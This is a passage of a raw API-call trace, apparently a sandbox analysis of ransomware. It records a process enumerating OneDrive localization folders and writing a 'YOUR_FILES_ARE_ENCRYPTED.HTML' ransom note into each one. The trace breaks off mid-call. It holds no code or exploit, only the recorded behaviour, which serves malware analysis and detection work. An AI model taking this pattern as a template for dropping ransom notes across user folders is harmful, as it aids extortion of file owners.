lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja" [0112.928] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja\\*" [0112.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f5b5174, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f5b5174, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f7cb58f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0112.928] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f5b5174, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f5b5174, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f7cb58f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.928] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f7cb58f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f7cb58f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f8fc8ef, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.928] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.928] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.928] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.928] lstrlenW (lpString=".mui") returned 4 [0112.928] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.928] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f7cb58f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f7cb58f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f8fc8ef, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.928] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0112.928] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.928] GetProcessHeap () returned 0x600000 [0112.928] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ja\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0112.929] WriteFile (in: hFile=0x308, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.930] CloseHandle (hObject=0x308) returned 1 [0112.930] GetProcessHeap () returned 0x600000 [0112.930] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.930] GetProcessHeap () returned 0x600000 [0112.930] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.930] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f8fc8ef, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f8fc8ef, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f8fc8ef, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ka", cAlternateFileName="")) returned 1 [0112.930] StrStrIW (lpFirst="ka", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.930] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka") returned 78 [0112.930] GetProcessHeap () returned 0x600000 [0112.930] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x688490 [0112.930] lstrcpyW (in: lpString1=0x688490, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka" [0112.930] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka\\*" [0112.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f8fc8ef, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f8fc8ef, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4faa013a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.931] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f8fc8ef, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f8fc8ef, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4faa013a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.931] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4faa013a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4faa013a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50286173, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.931] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.931] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.931] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.931] lstrlenW (lpString=".mui") returned 4 [0112.931] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.931] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4faa013a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4faa013a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50286173, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.931] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.931] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.931] GetProcessHeap () returned 0x600000 [0112.931] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ka\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0112.931] WriteFile (in: hFile=0x308, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.932] CloseHandle (hObject=0x308) returned 1 [0112.932] GetProcessHeap () returned 0x600000 [0112.933] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.933] GetProcessHeap () returned 0x600000 [0112.933] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.933] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50286173, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50286173, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50286173, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kk", cAlternateFileName="")) returned 1 [0112.933] StrStrIW (lpFirst="kk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.933] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk") returned 78 [0112.933] GetProcessHeap () returned 0x600000 [0112.933] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x688490 [0112.933] lstrcpyW (in: lpString1=0x688490, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk" [0112.933] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk\\*" [0112.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50286173, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50286173, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5042992c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0112.933] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50286173, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50286173, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5042992c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.933] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5042992c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5042992c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x504e8433, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.933] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.933] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.933] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.933] lstrlenW (lpString=".mui") returned 4 [0112.933] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.933] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5042992c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5042992c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x504e8433, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.933] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0112.934] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.934] GetProcessHeap () returned 0x600000 [0112.934] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\kk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0112.970] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.976] CloseHandle (hObject=0x324) returned 1 [0112.976] GetProcessHeap () returned 0x600000 [0112.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.976] GetProcessHeap () returned 0x600000 [0112.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.978] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5050e68c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5050e68c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5050e68c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="km-kh", cAlternateFileName="")) returned 1 [0112.978] StrStrIW (lpFirst="km-kh", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.978] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh") returned 81 [0112.978] GetProcessHeap () returned 0x600000 [0112.978] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.979] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh" [0112.979] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh\\*" [0112.979] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5050e68c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5050e68c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5068bb42, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.979] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5050e68c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5050e68c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5068bb42, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.979] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5068bb42, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5068bb42, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x507bcfb7, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.979] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.979] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.979] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.979] lstrlenW (lpString=".mui") returned 4 [0112.979] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.979] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5068bb42, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5068bb42, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x507bcfb7, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.980] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.980] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.980] GetProcessHeap () returned 0x600000 [0112.980] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\km-kh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0112.980] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.981] CloseHandle (hObject=0x324) returned 1 [0112.981] GetProcessHeap () returned 0x600000 [0112.981] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.981] GetProcessHeap () returned 0x600000 [0112.981] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.982] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x507bcfb7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x507bcfb7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x507bcfb7, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kn", cAlternateFileName="")) returned 1 [0112.982] StrStrIW (lpFirst="kn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.982] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn") returned 78 [0112.982] GetProcessHeap () returned 0x600000 [0112.982] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.983] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn") 